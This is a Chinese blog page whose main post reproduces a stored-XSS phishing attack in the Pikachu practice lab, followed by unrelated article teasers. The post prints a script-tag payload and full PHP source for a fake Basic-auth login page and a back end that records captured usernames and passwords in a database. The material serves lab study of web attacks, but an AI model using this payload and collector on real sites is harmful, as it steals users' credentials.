当前位置：首页 > news >正文

1、pikachu靶场之xss钓鱼复现

news 2025/9/15 18:04:42

一、复现过程

1、payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

将这段代码插入到含有储存xss的网页上，如下留言板

2、此时恶意代码已经存入数据库，并存在网页中，当另一个用户打开这个网页时，就会触发xss恶意代码，被跳转的另一个页面，并弹出登入框

3、这个时候如果输入账号密码，就会被恶意构造的后台窃取储存

二、分析流程

1、fish.php：文件源码分析，这是恶意构造的页面，即恶意插入xss代码中的url：127.0.0.1/pkxss/xfish/fish.php

即复现步骤2的恶意构造登入页面的源码

这是一个basic认证，你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框，并给出迷惑性的infoheader('Content-type:text/html;charset=utf-8');header("WWW-Authenticate: Basic realm='认证'");header('HTTP/1.0 401 Unauthorized');echo 'Authorization Required.';exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader("Location: http://127.0.0.1/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}?>

2、xfish.php：他会获取到传入过来的账号密，并将这些存入数据库

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();if(!empty($_GET['username']) && !empty($_GET['password'])){$username=$_GET['username'];$password=$_GET['password'];$referer="";$referer.=$_SERVER['HTTP_REFERER'];$time=date('Y-m-d g:i:s');$query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";$result=mysqli_query($link, $query);
}?>

总结：

1、在含有xss漏洞页面，插入一个一个恶意script代码，代码会触发跳转页到恶意页面

1、pikachu靶场之xss钓鱼复现

一、复现过程 1、payload <script src"http://127.0.0.1/pkxss/xfish/fish.php"></script> 将这段代码插入到含有储存xss的网页上，如下留言板 2、此时恶意代码已经存入数据库，并存在网页中，当另一个用户打开这个网页…...

编程日记 2024/5/28 17:42:44

弘君资本炒股技巧：股票定向增发是什么意思？是好是坏？

股票定向增发是指已上市的公司向指定的组织或者个人投资者额外发行股份募集资金的融资方法，发行价格为发行前某一阶段的平均价的必定比例，增发的价格不得低于前二十个买卖日股票均价的80％。例如，个股定增前二十个买卖股票平均价为…...

编程日记 2024/5/28 17:41:42

vue3项目使用pinia状态管理器----通俗易懂

1、首先安装pinia yarn add pinia # 或使用npm npm install pinia 2、在项目的src目录下新建store文件夹，然后store目录下新建index.js / index.ts ： 我这里是index,js import { createPinia } from "pinia"// 创建 Pinia 实例 const pinia …...

编程日记 2024/5/28 17:40:41

零基础学Java第二十五天之Lambda表达式

Lambda表达式简介 Lambda是一个匿名函数(方法)， 允许把函数作为一个方法的参数。利用Lambda表达式可以写出更简洁、更灵活的代码。作为一种更紧凑的代码风格，使Java的语言表达能力得到了提升。一般都是优化匿名内部类基础语法无参数、无返回值的抽…...

编程日记 2024/5/28 17:39:40

VSCode配置Lua5.4安装

参考：VSCode 配置 Lua 开发环境(清晰明了)_lua vscode-CSDN博客 1.下载 Lua Binaries Download (sourceforge.net) 2.配置环境变量解压放到某文件夹： 环境变量： 3.VSCode安装插件 4.配置 5.测试...

编程日记 2024/5/28 17:35:36

1. 安装docker、docker-compose # 安装Docker yum install -y yum-utils device-mapper-persistent-data lvm2 yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo sed -i sdownload.docker.commirrors.aliyun.com/docker-ce /…...

编程日记 2024/5/28 17:34:35

ComfyUI工作流网站

https://openart.ai/home https://comfyworkflows.com/ https://civitai.com/...

编程日记 2024/5/28 17:33:34

【机器学习】机器学习基础概念与初步探索

❀机器学习 📒1. 引言📒2. 机器学习概述📒3. 机器学习基础概念🎉2.1 机器学习的分类🎉2.2 数据预处理🌈数据清洗与整合🌈 特征选择和特征工程🌈数据标准化与归一化 📒4. …...

编程日记 2024/5/28 17:32:33

学英语材料：单口喜剧、讲故事、短剧喜剧以及广播剧和播客节目

学习英语节目有名的单口喜剧、讲故事、短剧喜剧以及广播剧和播客节目： 单口喜剧（Stand-up Comedy） 描述：这是最接近相声的形式，表演者独自一人站在舞台上，用幽默的方式讲述个人经历、观察到的社会现象或…...

编程日记 2024/5/28 17:31:32

Docker Compose使用

Docker-Compose是什么 docker建议我们每一个容器中只运行一个服务,因为doker容器本身占用资源极少，所以最好是将每个服务单独分割开来，但是这样我们又面临了一个问题： 如果我需要同时部署好多个服务，难道要每个服务单独写Docker…...

编程日记 2024/5/28 17:28:28

如何优雅的卸载linux上的todesk

要优雅地卸载Linux上的ToDesk，您可以按照以下步骤操作： 打开终端。输入以下命令来停止ToDesk服务（如果它正在运行的话）： sudo systemctl stop todesk 然后，使用包管理器卸载ToDesk。如果您使用的是apt&…...

编程日记 2024/5/28 17:26:27

【Vue】el-checkbox多选框实现单选效果，选中一个选项则自动取消其他勾选

🤵 作者：coderYYY 🧑 个人简介：前端程序媛，目前主攻web前端，后端辅助，其他技术知识也会偶尔分享🍀欢迎和我一起交流！🚀（评论和私信一般会回&#…...

编程日记 2024/5/28 17:25:26

Linux中使用vi编辑器自动缩进4个字符

平常在Linux操作系统下书写shell脚本内容，或是把写好的shell内容直接复制到vi编辑器中，本来缩进好的字符，会自动变乱，这是因为Linux的vi编辑器默认是缩进8个字符造成，可以使用下面2个方法解决该问题的发生。 1、本用户…...

编程日记 2024/5/28 17:24:25

#笔记#笔记#其他

大鱼论文是一款非常靠谱、方便、值得推荐的论文写作工具。无论是在学术研究中还是在日常写作中，大鱼论文都能够帮助用户轻松完成论文的写作工作。首先，大鱼论文提供了强大的查重降重功能，能够帮助用户快速定位论文中可能存在的抄袭问题&…...

编程日记 2024/5/28 17:21:22

gtask笔记

1、创建Task GTask *g_task_new (gpointer source_object, GCancellable *cancellable, GAsyncReadyCallback callback, gpointer callback_data); source_object：GObject对象，拥有者 cancellable：可否取消 callback：task完成后…...

编程日记 2024/5/28 17:19:18

【Linux学习】深入探索进程等待与进程退出码和退出信号

文章目录退出码return退出进程的等待进程等待的方法退出码 main函数的返回值：进程的退出码。一般为0表示成功，非0表示失败。每一个非0退出码都表示一个失败的原因； echo $？命令作用：查看进程退出码。&#xf…...

编程日记 2024/5/28 17:18:16

Linux：线程

文章目录前言1. 线程概念1.1 什么是线程1.2 线程比进程更加轻量化1.3 虚拟地址到物理地址的转化物理内存的管理页表 1.4 线程的优点1.5 线程的缺点1.6 线程异常1.7 线程用途 2. 进程 vs 线程3. 线程控制3.1 线程创建3.2 线程退出3.3 线程等待3.4 分离线程3.5 线程取消 4. 线程…...

编程日记 2024/5/28 17:17:15

卡到BUG了：删除重发白得积分（以前删除会扣减积分）

以前是：删除文章，积分减少，点赞积分减少，从回收站恢复文章，积分恢复，点赞数恢复但点赞积分不恢复。也就是删除重发总积分减少点赞的积分，有损失。今天是：删除文章，积分不…...

编程日记 2024/5/28 17:15:13

轻松拿捏C语言——【字符函数】字符分类函数、字符转换函数

🥰欢迎关注轻松拿捏C语言系列，来和小哇一起进步！✊ 🌈感谢大家的阅读、点赞、收藏和关注💕 🌹如有问题，欢迎指正感谢目录👑 一、字符分类函数🌙 二、字符转换函数…...

编程日记 2024/5/28 17:14:12

【Rust日报】ratatui版本更新

[new ver] ratatui v0.26.3 一个构建终端用户界面的库。新版本包括： 修复Unicode 截断 bug对颜色更好地序列化更快的渲染弃用assert_buffer_eq宏暴露错误类型常量函数和类型官网: https://ratatui.rs/ 链接: https://ratatui.rs/highlights/v0263/ [new lib] ansi2…...

编程日记 2024/5/28 17:12:10